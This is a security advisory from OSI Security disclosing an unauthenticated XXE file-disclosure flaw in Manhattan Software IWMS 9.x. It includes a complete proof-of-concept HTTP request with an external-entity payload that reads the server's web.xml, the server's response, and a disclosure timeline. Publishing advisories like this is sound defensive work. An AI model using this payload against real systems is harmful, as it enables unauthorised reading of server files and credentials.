https://www.osisecurity.com.au/manhattan-software-iwms-integrated-workplace-management-system-xml-external-entity-xxe-injection-file-disclosure.html Date: 04-Apr-2017 Product: Trimble / Manhattan Software IWMS (integrated workplace management system) Versions affected: 9.x Vulnerability: XML External Entity injection (XXE) Example: There is an XXE in services such as: https://[target]/services/WSFUNCTION https://[target]/services/WSGRID https://[target]/services/WSLOOKUP https://[target]/services/WSVALIDATE The services ignore the presence of authentication cookies as well. Example: POST /services/WSFUNCTION HTTP/1.1 Host: [target] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Content-Type: text/xml; charset=UTF-8 Referer: [target]/wrd/run/SPDEMLOGIN Content-Length: 1119 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///C:/Manhattan/Tomcat/webapps/ROOT/WEB-INF/web.xml" >]><foo>&xxe;</foo> Server response: HTTP/1.1 500 Internal Server Error Date: Mon, 13 Oct 2014 00:44:15 GMT Server: Apache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 409 Connection: close Content-Type: text/xml;charset=UTF-8 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Body> <soapenv:Fault> <faultcode>soapenv:Client</faultcode> <faultstring>{Parser Fatal Error on Line 0, Position 0 }An exception occurred! Type:NetAccessorException, Message:Could not open file: http://java.sun.com/xml/ns/javaee/web-app_3_0.xs</faultstring> </soapenv:Fault> </soapenv:Body> </soapenv:Envelope> (You can see it has read the comments within the web.xml file) Now patched with an input filter: java.lang.NullPointerException com.manhattansoftware.web.InjectionAttackFilter.log(InjectionAttackFilter.java:123) com.manhattansoftware.web.InjectionAttackFilter.doFilter(InjectionAttackFilter.java:61) com.manhattansoftware.web.XFrameFilter.doFilter(XFrameFilter.java:38) Credit: Discovered by Patrick Webster Disclosure timeline: 11-Oct-2014 - Discovered during audit. 14-Oct-2014 - Reported to vendor. 18-Feb-2015 - Vendor released patch. 04-Apr-2017 - Public disclosure. About OSI Security: OSI Security is an independent network and computer security auditing and consulting company based in Sydney, Australia. We provide internal and external penetration testing, vulnerability auditing and wireless site audits, vendor product assessments, secure network design, forensics and risk mitigation services. We can be found at http://www.osisecurity.com.au/